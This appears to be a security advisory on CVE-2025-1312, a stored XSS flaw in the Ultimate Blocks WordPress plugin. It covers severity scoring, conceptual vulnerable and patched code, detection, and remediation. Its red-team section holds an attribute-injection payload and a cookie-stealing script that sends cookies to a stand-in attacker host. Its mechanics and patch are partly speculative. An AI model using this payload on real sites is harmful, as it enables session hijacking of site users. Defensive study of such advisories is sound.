CVE-2025-1312
Executive Summary
CVE-2025-1312 is a Stored Cross-Site Scripting (XSS) vulnerability in the Ultimate Blocks – WordPress Blocks Plugin for WordPress. The flaw resides in the buttonTextColor parameter, which is insufficiently sanitized and escaped. An authenticated attacker with at least Contributor-level privileges can inject arbitrary web scripts. When a user (including administrators) visits a page containing the malicious block, the script executes in their browser, potentially leading to session hijacking, defacement, or data theft.
This vulnerability affects all versions up to and including 3.2.7. As of this report, no official patch has been released, and no public exploit code is available. The EPSS score is 0.0%, indicating low exploitation likelihood in the wild at this time, but the risk remains significant for targeted attacks.

Supply Chain & Package Security
This vulnerability is specific to the WordPress plugin ecosystem. The plugin is distributed via the official WordPress Plugin Directory. Users should monitor for updates and consider disabling the plugin until a patch is available.
CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor-level)
- User Interaction: None
- Scope: Changed (vulnerability impacts resources beyond the vulnerable component)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. The requirement for authentication reduces the attack surface, but the potential for privilege escalation and lateral movement makes it a serious concern for multi-user WordPress sites.
Deep Dive & Mechanics
The vulnerability is a classic Stored XSS. The buttonTextColor parameter is used to set the color of text in a button block. The plugin fails to sanitize the input (e.g., stripping HTML/JavaScript) and does not escape the output when rendering the block on the front end.
Attack Flow:
- An attacker with Contributor-level access (or higher) creates or edits a post/page.
- They add an Ultimate Blocks button block.
- In the block settings, they inject a malicious payload into the
buttonTextColorfield, e.g.," onmouseover="alert('XSS')". - The payload is stored in the WordPress database.
- When any user (including admins) views the page, the injected script executes in their browser.
Why it works: The plugin likely outputs the color value directly into a style attribute or inline CSS without proper escaping. For example:
<span style="color: [USER_INPUT]">Button Text</span>
An attacker can break out of the attribute and inject event handlers or script tags.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
// In the render function of the button block
$button_text_color = $attributes['buttonTextColor'];
echo '<span style="color: ' . $button_text_color . ';">' . esc_html($button_text) . '</span>';
The $button_text_color is not sanitized or escaped, allowing attribute injection.
Patched Code (Expected):
$button_text_color = sanitize_hex_color($attributes['buttonTextColor']);
if ( ! $button_text_color ) {
$button_text_color = '#000000'; // default
}
echo '<span style="color: ' . esc_attr($button_text_color) . ';">' . esc_html($button_text) . '</span>';
The patch should validate the color as a hex value and escape the output using esc_attr().
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- WordPress instance with Ultimate Blocks plugin <= 3.2.7
- User account with Contributor-level privileges or higher
Steps:
- Log in as a Contributor.
- Create a new post or edit an existing one.
- Add the "Button" block from Ultimate Blocks.
- In the block settings, locate the
buttonTextColorfield. - Inject a payload such as:
or for a more persistent attack:" onmouseover="alert(document.cookie)"><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Publish or save the post.
- When any user visits the page, the script executes.
Note: No public exploit code is available. The above is a conceptual demonstration.
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual
buttonTextColorvalues in post meta or block attributes. - Look for posts containing
<script>tags or event handlers within style attributes. - Use WAF rules to block common XSS payloads in
buttonTextColorparameter.
Hardening:
- Disable the Ultimate Blocks plugin until a patch is released.
- Restrict Contributor-level access to trusted users only.
- Implement Content Security Policy (CSP) headers to mitigate XSS impact.
- Use a WordPress security plugin that scans for stored XSS.
Indicators of Compromise (IOCs)
- File:
/wp-content/plugins/ultimate-blocks/(presence of vulnerable version) - Database: Posts/pages containing
buttonTextColorwith non-hex values or suspicious characters (e.g.,<,>,",') - Network: Outbound requests to attacker-controlled domains from compromised WordPress instances
- Logs: WordPress audit logs showing creation/editing of posts by Contributor-level users with unusual block attributes

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until an official patch is released.
- Review and clean any posts/pages created by Contributor-level users for malicious content.
- Reset passwords for all Contributor-level accounts if compromise is suspected.
Long-term Fix:
- The vendor must release a patched version (3.2.8 or higher) that properly sanitizes and escapes the
buttonTextColorparameter. - Users should update to the latest version as soon as it becomes available.
Workarounds:
- Implement a Web Application Firewall (WAF) rule to block requests containing suspicious
buttonTextColorvalues. - Use a WordPress security plugin to monitor for XSS attempts.
- Restrict the
unfiltered_htmlcapability to trusted users only.
